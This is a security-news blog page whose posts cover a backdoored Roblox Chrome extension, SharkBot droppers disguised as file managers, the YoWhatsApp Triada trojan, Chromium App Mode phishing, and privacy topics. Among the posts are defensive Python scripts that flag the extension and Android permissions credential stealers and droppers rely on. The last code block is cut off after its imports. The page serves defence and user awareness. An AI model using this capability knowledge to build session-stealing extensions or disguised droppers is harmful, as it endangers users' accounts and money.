Showing posts with label Mobile Security.

Malicious Chrome Extension Discovered Siphoning Private Data of Roblox Players


Users of Roblox, the popular online game platform, are being targeted with a malicious Google Chrome browser extension that tries to siphon their passwords and private data.

Threat analysts at BleepingComputer uncovered two separate Chrome extensions called SearchBlox, with more than 200,000 downloads between them, containing a backdoor that allows attackers to steal users' Roblox credentials and their Rolimons assets.

It remains unclear whether the developer of the two extensions added the backdoor intentionally or whether another party did; in either case, analysts were able to examine the code and locate the backdoor.

The malicious extensions identified on the Chrome Web Store add a player search box to the Roblox page, which lets users scan the game's servers for other players. Although they carry different icons, both extensions were published by the same developer and have identical descriptions.

Surprisingly, the first extension was actually featured on the Chrome Web Store despite its three-star rating. The comments on its review page show Roblox players were quite satisfied with the extension before the backdoor was added, which suggests that a threat actor, rather than its developer TheM2, was responsible.

To contain the threat, researchers advised Roblox players to uninstall the extension immediately, clear browser cookies, and change their login credentials for Roblox, Rolimons, and any other website they logged in to while the extension was active.
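As an added example (not code from the report or from the SearchBlox extensions), the Python script below shows the check a responder would run after an incident like this: it audits Chrome extension manifests for the capability combination a credential stealer needs, namely access to the target site's pages plus cookie or network permissions. The manifest keys follow Chrome's published manifest schema; the sensitive-host list, the two sample manifests and the profile path mentioned in the usage note are assumptions.

```python
"""Audit Chrome extension manifests for the capabilities a credential-stealing
extension needs: running in or reading pages of the target site, plus cookie
or network access.

Added example; not code from the report above or from the SearchBlox
extensions. Manifest keys (permissions, host_permissions,
content_scripts[].matches) follow Chrome's published manifest schema.
The sample manifests below are constructed.
"""
import json
import os

# Sites whose sessions the advisory tells victims to reset (hypothetical list).
SENSITIVE_HOSTS = ("roblox.com", "rolimons.com")

# Permissions that let an extension read, modify or replay session state.
RISKY_PERMISSIONS = {"cookies", "webRequest", "webRequestBlocking",
                     "declarativeNetRequest", "scripting", "tabs"}

ALL_SITES = ("<all_urls>", "*://*/*", "http://*/*", "https://*/*")


def pattern_covers_host(pattern, host):
    """True if a Chrome match pattern such as '*://*.roblox.com/*' covers host."""
    if pattern == "<all_urls>":
        return True
    if "://" not in pattern:
        return False
    host_part = pattern.split("://", 1)[1].split("/", 1)[0]
    if host_part == "*":
        return True
    if host_part.startswith("*."):        # '*.roblox.com' also matches the bare domain
        base = host_part[2:]
        return host == base or host.endswith("." + base)
    return host == host_part


def audit_manifest(manifest, sensitive_hosts=SENSITIVE_HOSTS):
    """Return a list of findings (strings) for one parsed manifest.json."""
    findings = []
    perms = set(manifest.get("permissions", []))
    # Manifest V2 lists host patterns under 'permissions'; V3 uses 'host_permissions'.
    host_patterns = [p for p in perms if "://" in p or p == "<all_urls>"]
    host_patterns += manifest.get("host_permissions", [])
    for script in manifest.get("content_scripts", []):
        host_patterns += script.get("matches", [])

    for host in sensitive_hosts:
        hits = sorted({p for p in host_patterns if pattern_covers_host(p, host)})
        if hits:
            findings.append(f"can run code in or read pages on {host} via {hits}")
    risky = sorted(perms & RISKY_PERMISSIONS)
    if risky:
        findings.append(f"holds session-access permissions {risky}")
    if any(p in ALL_SITES for p in host_patterns):
        findings.append("has host access to every site")
    return findings


def scan_extensions_dir(extensions_dir):
    """Audit every <id>/<version>/manifest.json under a Chrome profile's
    Extensions directory; returns {id@version: (name, findings)} for hits only."""
    report = {}
    for ext_id in sorted(os.listdir(extensions_dir)):
        ext_path = os.path.join(extensions_dir, ext_id)
        if not os.path.isdir(ext_path):
            continue
        for version in sorted(os.listdir(ext_path)):
            manifest_path = os.path.join(ext_path, version, "manifest.json")
            if not os.path.isfile(manifest_path):
                continue
            with open(manifest_path, encoding="utf-8") as fh:
                manifest = json.load(fh)
            findings = audit_manifest(manifest)
            if findings:
                report[f"{ext_id}@{version}"] = (manifest.get("name", "?"), findings)
    return report


# Constructed manifests: the shape a harmless player-search helper would have,
# and the shape one with session-stealing capability would have.
BENIGN_SEARCH_BOX = {
    "manifest_version": 3, "name": "Player search (benign shape)",
    "permissions": ["storage"],
    "content_scripts": [{"matches": ["*://*.roblox.com/games/*"], "js": ["search.js"]}],
}
BACKDOORED_SHAPE = {
    "manifest_version": 3, "name": "Player search (backdoored shape)",
    "permissions": ["storage", "cookies", "webRequest"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["*://*.roblox.com/*", "*://www.rolimons.com/*"],
                         "js": ["search.js"]}],
}

if __name__ == "__main__":
    for m in (BENIGN_SEARCH_BOX, BACKDOORED_SHAPE):
        print(m["name"])
        for line in audit_manifest(m) or ["no findings"]:
            print("  -", line)
```

Point scan_extensions_dir() at a profile's Extensions folder (on a Linux install this is assumed to be ~/.config/google-chrome/Default/Extensions; Windows and macOS use different paths) to audit everything installed. A benign player-search helper legitimately needs a content script on roblox.com, so the question is not whether an extension touches the site but whether it also holds cookie, webRequest or all-sites access that none of its advertised features justify.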

A Google spokesperson confirmed that the extensions were removed immediately and would also be automatically removed from systems where they were installed.

"The identified malicious extensions are no longer available on the Chrome Web Store," Google stated. "The extensions are block listed and will be automatically removed from any user machine that previously downloaded them."

This is not the first time Roblox users have been victims of cybercrime. In May this year, security experts identified a malicious file concealed inside the legitimate Synapse X scripting tool, which is used to inject exploits or cheats into Roblox.

Malicious hackers used Synapse X to deploy a self-executing program on Windows PCs that installs library files into the Windows system folder. This has the potential to break applications, corrupt or erase data, or send data back to the attackers responsible.

SharkBot Malware Targets Thousands of Android Users Via Disguised File Manager App


Variants of the SharkBot banking trojan were identified in multiple file manager Android applications on the Google Play Store, some of them with thousands of downloads. 

Most users who downloaded the trojanized apps were located in the U.K., followed by Italy, Iran, and Germany, security researchers at Bitdefender said in an analysis published this week.

"The Google Play Store would likely detect a trojan banker uploaded to their repository, so criminals resort to more covert methods," reads the advisory. "One way is with an app, sometimes legitimate with some of the advertised features, that doubles as a dropper for more insidious malware."

This was the case with several file manager apps: the disguise justified asking the user for permission to install packages from outside the Play Store (the Android REQUEST_INSTALL_PACKAGES permission), because a genuine file manager may plausibly need it.


"Of course, that permission is used to download malware," the researchers wrote. "As Google Play apps only need the functionality of a file manager to install another app and the malicious behavior is activated for a restricted pool of users, they are challenging to detect."

Although the apps identified by the researchers have been removed from the Play Store, they can still be downloaded from several third-party stores, so they remain a live threat.

The first app examined by the researchers was 'X-File Manager,' published by 'Viktor Soft ICe LLC' and counting over 10,000 installs before Google took it down. The second was 'FileVoyager,' published by 'Julia Soft Io LLC' with nearly 5,000 downloads.

The researchers found two more apps using the same technique, 'Phone AID, Cleaner, Booster' and 'LiteCleaner M', which were never on the Google Play Store but were distributed through third-party app stores.

Bitdefender's advisory comes weeks after threat analysts at Cleafy reported that the Android banking trojan Vultur had reached more than 100,000 downloads on the Google Play Store.

Users who have installed the malicious apps are advised to delete them and change their bank account passwords immediately. Users should also keep Google Play Protect enabled and check an app's ratings and reviews before installing it.

Apple is Tracking Your Every Move, Here's All You Need to Know


Apple presents itself as a privacy-focused firm, but according to recent research the company may be contradicting its own policy when it collects App Store analytics data.

According to a Twitter thread by iOS developer and security researcher Tommy Mysk, Apple's analytics traffic carries a 'Directory Services Identifier' (dsId) that is tied to the customer's iCloud account, and therefore to private data such as name, email address, and contacts.

More worrying, the thread reports that even when customers switch off device analytics in the Settings menu, the same dsId is still sent by other Apple apps.

“Apple’s analytics data include an ID called “dsId”. We were able to verify that “dsId” is the “Directory Services Identifier”, an ID that uniquely identifies an iCloud account. Meaning, Apple’s analytics can personally identify you,” Mysk tweeted. 

However, Apple's Device Analytics & Privacy document states that none of the collected information is linked to the individual, implying that as a user you remain anonymous.

“None of the collected information identifies you personally. Personal data is either not logged at all, is subject to privacy preserving techniques such as differential privacy, or is removed from any reports before they’re sent to Apple. You can review this information on your iOS device by going to Settings > Privacy & Security > Analytics & Improvements and tapping Analytics Data,” the document reads.

Even though Apple maintains that it is a privacy-oriented firm that values customers' privacy and aims to give them more control over what they share with advertisers and app developers, the research suggests it can still use the dsId for its own purposes, whatever those may be.

Earlier this month, Gizmodo reported that a lawsuit had been filed against Apple, with the plaintiff alleging that Apple illegally collects user data even when its own privacy settings promise not to. The lawsuit draws on Mysk's research; the researcher was, however, unable to analyze the traffic on iOS 16 because it is encrypted.

Data of UK and EU Users is Accessible to TikTok Staff in China


A BBC investigation has disclosed that some TikTok staff in China have access to data from accounts in the UK and the European Union, which the Chinese-owned company has confirmed.

TikTok said the access is permitted under its privacy policy for staff with a demonstrated need to do their work, and is consistent with its "legal obligations."

The company has come under scrutiny from authorities around the world in recent years, including in the UK and the US, over concerns about the possible transfer of data to Chinese officials.

In the US, a commissioner at the communications regulator has called for the app to be banned outright.

According to TikTok's website, the policy applies to "the European Economic Area, the United Kingdom, and Switzerland."

In a statement on Wednesday, Elaine Fox, the platform's head of privacy and security for Europe, said that its global team plays a key role in maintaining a "consistent, enjoyable, and safe" experience for users.

Although TikTok currently stores European user data in the US and Singapore, Ms. Fox explained that "we have allowed certain employees from our corporate group based in Brazil, Canada, China, Israel, Japan, Malaysia, Philippines, Singapore, South Korea, and the United States remote access to TikTok European user data."

She said the company's approach centers on controlling which employees can access European user data: limiting the number of staff with access, minimizing data flows outside the region, and storing European user data locally.

She added that the arrangement was subject to a series of robust security controls and approval protocols and was compliant with the General Data Protection Regulation (GDPR) on the use of personal data.

The statement came in the same week that an official at the US communications regulator, the Federal Communications Commission, recommended a ban on TikTok.

Brendan Carr, one of the FCC's commissioners, told the Washington Post that he saw no solution other than a ban.

He said he did not believe there was any set of protections that could give sufficient confidence that user data would not find its way back to the Chinese Communist Party.

ByteDance, the company behind TikTok, has repeatedly denied that it is controlled by the Chinese government.

Authorities in the UK, the EU and the United States have scrutinized the app closely for the past few years.

Investigations under way

In August, after MPs publicly raised concerns about the risk of data being disclosed to the Chinese government, the UK Parliament closed its TikTok account.

Senior MPs said the account should stay closed until TikTok can give "credible assurances" that it will not be used to leak data to Beijing.

The Irish Data Protection Commission, TikTok's lead regulator in the EU, has also opened two privacy-related inquiries into the app.

The regulator is examining TikTok's processing of children's personal data, and whether its transfers of personal data to other countries, including China, comply with EU law.

In 2020, a US national security panel ordered ByteDance to sell off its American operations over concerns that user data could be shared with Chinese authorities.

In June this year, TikTok said it had migrated US users' information to servers run by the American software company Oracle in Austin, Texas.

Last month, TikTok denied a report that a ByteDance team in China had planned to use the app to track the locations of specific American citizens.

The company said TikTok has never been used to target members of the US government, activists, public figures or journalists.

Ms. Fox also said on Wednesday that the app does not collect precise location data from its users in Europe.

With almost four billion downloads, TikTok is the world's fastest-growing social media app and one of the most popular.

According to Sensor Tower, an analysis firm that tracks mobile app trends, the company has earned more than $6.2bn (£5.4bn) in gross revenue from in-app purchases since its launch in 2017.

FCC Commissioner Brendan Carr Calls for TikTok Ban in US


The US government should ban TikTok rather than negotiate with the social media app, Brendan Carr, one of the five commissioners at the Federal Communications Commission, said in an interview with a local media outlet.

With more than 200 million downloads in the US alone, the app's immense popularity is a concern because ByteDance, a Chinese company, owns it, which means data on US residents could flow back to China. The FCC itself has no power to ban TikTok, but Congress has acted before after Carr raised concerns about Chinese telecom firms, including Huawei.

TikTok is currently negotiating with the Committee on Foreign Investment in the United States (CFIUS), a multi-agency government body that reviews business deals involving foreign ownership, over whether ByteDance could divest it to an American firm so that it can keep operating in the United States.

In September, the New York Times reported that a deal was taking shape but not yet final, and that Department of Justice official Lisa Monaco was concerned it did not provide enough insulation from China.

"I don’t believe there is a path forward for anything other than a ban," Carr said, citing recent incidents regarding how TikTok and ByteDance managed American consumers' data. “Perhaps the deal CFIUS ends up cutting is an amazing, airtight deal, but at this point, I have a very, very difficult time looking at TikTok’s conduct thinking we’re going to cut a technical construct that they’re not going to find a way around.” 

A few months ago, Carr sent letters to Apple and Google asking them to remove TikTok from their app stores. He is now calling for a nationwide ban despite efforts by both parties, the US government and TikTok, to reach an agreement.

“Commissioner Carr has no role in or direct knowledge of the confidential discussions with the US government related to TikTok and is not in a position to discuss what those negotiations entail,” a TikTok spokesperson responded. “We are confident that we are on a path to reaching an agreement with the US government that will satisfy all reasonable national security concerns.” 

For now it is business as usual for the Chinese-owned app in the US, though creators may want a backup plan in case of a ban. YouTube Shorts is one option, and it pays better too.

Countering Financial Data Leak in the Era of Digital Payments


Over the past five years there has been a huge surge in the use of financial services technologies, and with it the risk of a financial data breach has grown. Many of these services use screen scraping to access consumers' private banking data.

Screen scraping is a technique in which a customer hands their banking app login credentials to a third-party provider (TPP). The TPP then runs a software robot that logs in to the bank's app or website on the user's behalf and reads the data. The TPP therefore holds the customer's full credentials and can do anything the customer can, and the bank cannot tell the robot from the customer.

“The way consumers traditionally connect to their bank accounts is facilitated through screen scraping, where providers require internet banking login information,” explained Joe Pettersson, Chief Technology Officer at Banked. 

A safer alternative to screen scraping is an API, which lets the two systems talk to each other through a defined interface, so the customer's credentials never leave the bank. Three benefits of using an API:

Easier for developers 

APIs come with documentation, which gives developers a common language for connecting two systems. They do not need to learn the internals of a full fraud prevention engine; the documentation tells them exactly how to call the functions they need. This saves time and effort for the whole IT team and makes the fraud system more cost-effective.

Good for Scaling

However efficient a person is, there is no way to review all user data manually. APIs fill that gap by answering queries quickly for hundreds of thousands of user logins, transactions, or signups.

Automates everything 

Because APIs are delivered as web services, there is no need to tweak them regularly or wait for IT updates. Fixes and improvements are made on the server side, so businesses can focus on their business. This is cheaper in IT resources and also much faster.
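To make the contrast concrete, here is an added Python model of the API side (not code from Banked or from any open-banking specification, and a deliberate simplification of OAuth-style delegated access): the bank mints a signed token for a third-party provider that carries an explicit scope and expiry, and every API call is checked against both. A screen-scraping provider, by comparison, holds the customer's real password, and the bank cannot scope, expire or revoke what it can do. The signing key, scope names, endpoints and account data are assumptions.

```python
"""Scoped, expiring API access as the alternative to shared banking credentials.

Added illustration, not code from Banked or any open-banking standard; a
minimal stand-in for OAuth2-style delegated access using an HMAC-signed
token. BANK_SIGNING_KEY, the scope names and the endpoints are assumptions.
"""
import base64
import hashlib
import hmac
import json
import time

BANK_SIGNING_KEY = b"demo-only-key"   # assumption: known only to the bank

# Which scope each endpoint requires (hypothetical API surface).
REQUIRED_SCOPE = {"GET /accounts": "accounts:read", "POST /payments": "payments:write"}


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(tpp_id, scopes, ttl_seconds, now=None, key=BANK_SIGNING_KEY):
    """Bank side: mint a token bound to one TPP, an explicit scope list and an expiry."""
    now = time.time() if now is None else now
    payload = {"tpp": tpp_id, "scope": sorted(scopes), "exp": int(now + ttl_seconds)}
    body = _b64(json.dumps(payload, separators=(",", ":")).encode())
    sig = _b64(hmac.new(key, body.encode(), hashlib.sha256).digest())
    return f"{body}.{sig}"


def verify_token(token, now=None, key=BANK_SIGNING_KEY):
    """Bank side: return the payload if the signature and expiry check out, else None."""
    now = time.time() if now is None else now
    try:
        body, sig = token.split(".", 1)
    except ValueError:
        return None
    expected = _b64(hmac.new(key, body.encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(sig, expected):     # tampered body or forged signature
        return None
    payload = json.loads(_unb64(body))
    if payload["exp"] <= now:                      # expired: the TPP must be re-authorised
        return None
    return payload


def bank_api(endpoint, token, now=None):
    """Bank side: an endpoint handler that enforces the token's scope per call.
    Returns (status, body) in the shape of an HTTP response."""
    payload = verify_token(token, now)
    if payload is None:
        return 401, {"error": "invalid or expired token"}
    needed = REQUIRED_SCOPE.get(endpoint)
    if needed is None:
        return 404, {"error": "no such endpoint"}
    if needed not in payload["scope"]:
        return 403, {"error": f"scope {needed} not granted to {payload['tpp']}"}
    if endpoint == "GET /accounts":
        return 200, {"accounts": [{"id": "acct-1", "balance": 1234.56}]}   # constructed data
    return 201, {"payment": "accepted"}


if __name__ == "__main__":
    # A budgeting app is granted read-only access for ten minutes.
    t0 = 1_700_000_000
    token = issue_token("tpp-budget-app", ["accounts:read"], 600, now=t0)
    print(bank_api("GET /accounts", token, now=t0 + 10))     # 200: within scope
    print(bank_api("POST /payments", token, now=t0 + 10))    # 403: scope not granted
    print(bank_api("GET /accounts", token, now=t0 + 601))    # 401: expired
```

The point is not the token format but what the bank can enforce: with a scoped token it can refuse a payment from a provider that was only ever granted read access, let the grant lapse, or revoke it, none of which is possible once a scraper has been handed the customer's password.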


To mitigate fraud risk, spreading knowledge of new payment technologies, channels and products, and of the risks involved, to both customers and employees is a crucial part of a fraud prevention strategy. Embedding fraud management into overall customer engagement and experience should be the first step.

Change These Settings to Prevent Your Android From Tracking You


You are being watched at every turn in today's connected world. Apps and websites of all kinds track and collect your data for a wide range of purposes. Apple uses your data to process your transactions, Twitter uses it to serve you relevant advertisements, and Life360 uses it to improve its location services.

Some apps and websites use your personal information for legitimate purposes, but not all of them do, so it is wise to protect your privacy as much as possible.

The steps below will help you stop your Android device from tracking you. They cover deleting your web and app activity history, turning off apps' access to your location, and disabling unnecessary location settings.

Turn off your Location History

GPS is probably the most powerful way your Android phone can track your location. If you are signed in to your Google account with Location History enabled, Google records every place you visit. That brings benefits such as personalized maps, traffic reports, and the ability to find a lost phone.

If you would rather Google did not follow you everywhere, you can turn Location History off:

  • Open the Settings app on your phone.
  • Tap Google.
  • Tap "Manage your Google Account."
  • Open the "Data & privacy" tab.
  • Under "History settings," select Location History.
  • Tap "Turn off."
  • In the dialog that appears, tap "Pause."
You can also delete the Location History already stored, either all of it or only data older than 3, 18, or 36 months.

To have Google delete old Location History automatically:

  • Open Google Maps.
  • Tap your profile icon.
  • Select "Your Timeline."
  • Tap the More icon (three vertical dots) in the top-right corner.
  • Select "Settings and privacy."
  • Under "Location settings," choose "Automatically delete Location History."
  • Select "Auto-delete activity older than."
  • From the drop-down menu, choose 3, 18, or 36 months.
  • Tap Next.
  • Tap Confirm.
  • Tap "Got it" to exit.

Data older than the period you chose will be deleted from your account within a few days.

Turn off Web & App Activity

Location History is not the only setting that saves your location. Web & App Activity stores the same information and a lot more: with it enabled on your Google Account, Google keeps your searches, your location and IP address, the ads you clicked, and even your purchases. To turn it off:
  • Launch the Settings app.
  • Scroll down and tap Google.
  • Select "Manage your Google Account."
  • Open the "Data & privacy" tab.
  • Under "History settings," select "Web & App Activity."
  • Tap "Turn off."
  • Tap Pause.
  • Tap "Got it" to exit.
  • Back on the "Web & App Activity" page, tap "Choose an auto-delete option" to delete saved data automatically.
  • Select "Auto-delete activity older than."
  • From the drop-down menu, choose whether to delete saved data older than 3, 18, or 36 months.
  • Tap Next.
  • Tap Confirm.
  • Tap "Got it" to exit.

Update your location settings 

Besides stopping Google from saving your location, you should also change your phone's own location settings. The settings you can turn off include:


Wi-Fi and Bluetooth scanning: the phone scans for nearby Wi-Fi networks and Bluetooth devices to improve its location fix, even when Wi-Fi and Bluetooth are switched off.

Emergency Location Service: lets emergency responders pinpoint your location when you call for help.

Google Location Accuracy: uses your phone's sensors, Wi-Fi, and the mobile network to improve the location the phone reports.

To manage these settings:

  • Launch the Settings app.
  • Select Location.
  • Turn off the "Use location" toggle at the top of the screen.
  • Select "Wi-Fi and Bluetooth scanning."
  • Turn off both "Wi-Fi scanning" and "Bluetooth scanning."
  • Tap Back to return to the Location screen.
  • Select Advanced.
  • Tap Emergency Location Service.
  • Turn the toggle off if you prefer.
  • Return to the Location screen.
  • Tap Google Location Accuracy.
  • Turn off the toggle next to "Improve Location Accuracy."

Edit your device's permissions 

Most apps, if not all, ask for location access to give you the best experience. Facebook, for example, uses your location to tag posts, find nearby places, and serve relevant ads.

Under Settings > Location > App access to location you can see which apps have access to your location and when. Apps fall into three groups: allowed all the time, allowed only while in use, and not allowed. To revoke location access from an app in the first two groups, tap the app and select "Don't allow."

On Android 12 and later, each app also has a "Use precise location" toggle. With it on, the app receives your exact location; with it off, the app only gets an approximate location, somewhere within an area of about 3 square kilometres around the device.
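The following Python script is an added example that serves two passages on this page: the SharkBot droppers described above, which posed as file managers to justify asking for the REQUEST_INSTALL_PACKAGES permission, and the location permissions described in this section, where "all the time", "only while in use" and "Use precise location" map onto the ACCESS_BACKGROUND_LOCATION, ACCESS_COARSE_LOCATION and ACCESS_FINE_LOCATION runtime permissions. It parses the output of `adb shell dumpsys package` and reports which apps can install other packages and what location access each app holds. It is not Bitdefender's or Google's tooling; the sample dump is constructed and its line format is an assumption based on typical dumpsys output.

```python
"""Audit Android app permissions from `adb shell dumpsys package` output.

Added example, not Bitdefender's or Google's tooling. The sample dump is
constructed and shaped like the 'requested permissions' / 'granted=' lines of
typical dumpsys output (assumed format; compare with your device's output).

Usage on a real device:  adb shell dumpsys package | python3 audit_perms.py
"""
import re
import sys

INSTALL = "android.permission.REQUEST_INSTALL_PACKAGES"
FINE = "android.permission.ACCESS_FINE_LOCATION"
COARSE = "android.permission.ACCESS_COARSE_LOCATION"
BACKGROUND = "android.permission.ACCESS_BACKGROUND_LOCATION"

PKG_RE = re.compile(r"^\s*Package \[([\w.]+)\]")
GRANT_RE = re.compile(r"^\s*([\w.]+): granted=(true|false)")
REQUESTED_RE = re.compile(r"^\s*(android\.permission\.[A-Z_]+)\s*$")


def parse_dumpsys_package(text):
    """Return {package: {'requested': set(...), 'granted': set(...)}}."""
    pkgs, current = {}, None
    for line in text.splitlines():
        m = PKG_RE.match(line)
        if m:                                   # start of a new package block
            current = pkgs.setdefault(m.group(1), {"requested": set(), "granted": set()})
            continue
        if current is None:
            continue
        m = GRANT_RE.match(line)                # install/runtime permission with grant state
        if m:
            if m.group(2) == "true":
                current["granted"].add(m.group(1))
            continue
        m = REQUESTED_RE.match(line)            # bare name under 'requested permissions:'
        if m:
            current["requested"].add(m.group(1))
    return pkgs


def location_access(info):
    """Translate granted permissions into the wording of the Location settings screen."""
    granted = info["granted"]
    if FINE not in granted and COARSE not in granted:
        return "not allowed"
    when = "all the time" if BACKGROUND in granted else "only while in use"
    precision = "precise" if FINE in granted else "approximate"
    return f"{when} ({precision})"


def audit(text):
    """Summarise dropper capability and location access for every package."""
    pkgs = parse_dumpsys_package(text)
    return {
        "can_install_packages": sorted(p for p, i in pkgs.items() if INSTALL in i["requested"]),
        "location": {p: location_access(i) for p, i in pkgs.items()},
    }


# Constructed sample: a 'file manager' that asks to install packages, a weather
# app with background precise location, and a notes app with location denied.
SAMPLE_DUMPSYS = """\
Packages:
  Package [com.example.filemanager] (1a2b3c):
    requested permissions:
      android.permission.INTERNET
      android.permission.REQUEST_INSTALL_PACKAGES
    install permissions:
      android.permission.INTERNET: granted=true
      android.permission.REQUEST_INSTALL_PACKAGES: granted=true
  Package [com.example.weather] (4d5e6f):
    requested permissions:
      android.permission.ACCESS_FINE_LOCATION
      android.permission.ACCESS_BACKGROUND_LOCATION
    User 0: ceDataInode=0 installed=true hidden=false
      runtime permissions:
        android.permission.ACCESS_COARSE_LOCATION: granted=true
        android.permission.ACCESS_FINE_LOCATION: granted=true
        android.permission.ACCESS_BACKGROUND_LOCATION: granted=true
  Package [com.example.notes] (7a8b9c):
    requested permissions:
      android.permission.ACCESS_COARSE_LOCATION
    User 0: ceDataInode=0 installed=true hidden=false
      runtime permissions:
        android.permission.ACCESS_COARSE_LOCATION: granted=false
"""

if __name__ == "__main__":
    dump = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_DUMPSYS
    result = audit(dump)
    print("apps that can install other packages:", result["can_install_packages"])
    for pkg, access in sorted(result["location"].items()):
        if access != "not allowed":
            print(f"{pkg}: location {access}")
```

An app that requests REQUEST_INSTALL_PACKAGES is not malicious by itself; package installers and file managers need it. The value of the list is that it is short, so each entry can be checked against whether the app has any feature that needs to install other apps, which is exactly the question the Bitdefender researchers say the Play Store review struggled with.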

Check your Google Chrome settings 

Many websites ask for your location while you browse. Sometimes that is useful: a hardware retailer's site, for example, can show you the nearest store.

To check which websites currently have access to your location in Google Chrome:

  • Launch Chrome.
  • Tap the More icon (three vertical dots) in the top-right corner of the screen.
  • Select Settings.
  • Scroll down to the "Advanced" section.
  • Tap Site settings.
  • Select Location.
  • Expand the "Allowed" section to see all the sites that can see your location.
To remove a site's location access, tap the site and choose Block. You can also turn off location sharing in Chrome altogether so that no site you visit gets your location. If you are particularly concerned about your privacy, consider switching to a privacy-focused Android browser such as Tor Browser or Firefox.

Turn off ad personalization

Ads are becoming ever more sophisticated: research plaid skirts one day and the next you are bombarded with ads for plaid skirts. Online ads behave as if they watch your every move and know what you like before you do. Here is how to turn off ad personalization on your Android device:

  • Launch the Settings app.
  • Tap Google.
  • Tap "Manage your Google Account."
  • Open the "Data & privacy" tab.
  • Under Ad settings, tap "Ad personalization."
  • Turn off the toggle next to "Ad personalization is ON."
  • Select "Turn off" in the pop-up box.
  • Tap "Got it" to exit.

Disabling ad personalization does not mean you will stop seeing ads. They will still appear, but they will be general ads rather than ones built from your browsing history.

This Unofficial WhatsApp Android App Caught Stealing Users’ Accounts


Kaspersky researchers discovered 'YoWhatsApp,' an unofficial WhatsApp Android app that steals the access keys for users' accounts. Such 'mod' apps are promoted as unofficial versions of genuine apps with features the official version lacks.

YoWhatsApp is a fully functional messenger with extra features such as customising the interface and blocking access to specific chats. The tainted app requests the same permissions as the original messenger, including SMS access.

“To use the WhatsApp mod, users need to log in to their account of the legitimate app. However, along with all the new features, users also receive the Triada Trojan. Having infected the victim, attackers download and run malicious payloads on their device, as well as get hold of the keys to their account on the official WhatsApp app.” reported Kaspersky. 

“Along with the permissions needed for WhatsApp to work properly, this gives them the ability to steal accounts and get money from victims by signing them up for paid subscriptions that they are unaware of.”

The mod installs the Triada Trojan, which can deliver other malicious payloads, sign victims up to paid subscriptions, and steal WhatsApp accounts. According to Kaspersky, more than 3,600 users were targeted in the past two months. The malicious YoWhatsApp build was advertised inside the official Snaptube app.

The malicious app was also found in the popular Vidmate app, which is used to save and watch YouTube videos; unlike with Snaptube, the malicious build was uploaded to Vidmate's internal store. According to Kaspersky, YoWhatsApp v2.22.11.75 steals WhatsApp keys, allowing threat actors to take over users' accounts.

In 2021, Kaspersky found another modified WhatsApp for Android, FMWhatsApp 16.80.0, that offered extra features but delivered the Triada Trojan.

In that case the mod bundled an advertising software development kit (SDK) that contained a malicious payload downloader. FMWhatsApp collected unique device identifiers (device IDs, subscriber IDs, MAC addresses) as well as the name of the app package in which it was deployed.

To stay protected, the researchers advise:
  • Only install applications from official stores and reliable sources.
  • Check which permissions you give installed applications; some of them can be very dangerous.
  • Install a reliable mobile antivirus on your smartphone, such as Kaspersky Internet Security for Android, to detect and block possible threats.
Kaspersky concluded, “Cybercriminals are increasingly using the power of legitimate software to distribute malicious apps. This means that users who choose popular apps and official installation sources may still fall victim to them. In particular, malware like Triada can steal an IM account, and for example, use it to send unsolicited messages, including malicious spam. The user’s money is also at risk, as the malware can easily set up paid subscriptions for the victim.”

iPhone 14 Crash Detection Feature Contacts Emergency Services on Roller Coasters


Apple's Crash Detection feature on the iPhone 14 mistakes some roller coaster rides for a severe car crash and calls 911.

According to the Wall Street Journal (WSJ), there have been several incidents in which an iPhone 14 contacted 911 during a roller coaster ride and played the message "The owner of this iPhone was in a severe car crash and is not responding to their phone."

Crash detection was introduced earlier this year with the iPhone 14 and the Apple Watch Series 8, Ultra, and SE on the latest OS.

Between September 18 and October 9, the Warren County Communications Center received 12 such calls from iPhones whose owners were riding a coaster at Kings Island, said Melissa Bour, director of Warren County emergency services.

Riders are not the only ones affected; the feature has also been triggered when a phone was dropped from a moving vehicle. “I was on a motorcycle ride today and my new iPhone 14 pro flew off my handlebars on the highway. RIP. I immediately drove to apple to get a new temp phone sorted. Meanwhile, my whole family thought I was dead. The iPhone 14 sent out crash alerts to my circle,” Douglas Sonders tweeted. 

According to Sara White, a 39-year-old dentist, her iPhone automatically contacted 911 when she went to Mystic Timbers at Kings Island. The wooden roller coaster is 109 feet tall with top speeds of 53 mph. 

“The owner of this iPhone was in a severe car crash and is not responding to their phone,” an automated voice says in the call to 911, before also providing longitude and latitude coordinates. Screams from others on the ride can be heard in the background of the call. 

Earlier this year Warren County Emergency Services set up a text message alert system to help people injured in road accidents, but it was not designed for calls triggered by crash detection. “It's saying that there's a crash that's been detected, so that's a little different than the 911 hang ups or silences,” Bour added. “So we make up a call for a crash with unknown injuries, because we haven't spoken to anyone, and then once that call is made up, it gets dispatched out to the police officer.” 

Crash detection has the potential to save many lives, but wasting emergency workers' time could backfire. The iPhone 14 is also new, so the problem is only set to grow as millions more handsets are sold over the coming months.

The tech giant may roll out an update in the near future to differentiate a roller coaster from a car crash, but in the meantime, iPhone owners are recommended to put their iPhone 14 on Airplane Mode or disable Crash Detection before getting on the coaster (Settings -> Emergency SOS -> Call After Severe Crash toggle).

Malicious Actors Are Exploiting ‘App Mode’ in Chromium Browsers for Phishing Attacks


Thanks to a new phishing technique, malicious actors could siphon private details merely by impersonating legitimate login forms in Application Mode. 

The Application Mode feature is available in all Chromium-based browsers, including Google Chrome, Microsoft Edge, and Brave. 

According to mr.d0x, a security researcher who previously unearthed the Browser-in-the-Browser (BitB) attack and the Microsoft WebView2 phishing method, desktop applications are normally harder to spoof, so victims pay less attention to them than to browser windows, which are more widely exploited for phishing. 

Chrome's application mode is designed to provide a native-like experience: the website is launched in a separate browser window that displays the site's favicon and hides the address bar. 

Additionally, the attacker-controlled malicious site can use JavaScript to perform multiple operations, such as closing the window immediately after the victim enters their credentials, or resizing and positioning the window to achieve the desired look. 

It's worth noting that the technique works on other operating systems as well, including macOS and Linux, making it a possible cross-platform threat. However, the effectiveness of the attack depends on the attacker first gaining some control over the computer before following up with this phishing technique, be it via malware or by convincing the victim to run a Windows shortcut that launches the browser with the malicious URL. 
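As an added defender-side example (not from the researcher's write-up or Google), here is Python triage logic run over constructed process-creation events that flags Chromium browsers launched with `--app=` pointing at hosts outside an allowlist; the event fields, hostnames, paths and parent processes are all assumptions.

```python
import re
from urllib.parse import urlparse

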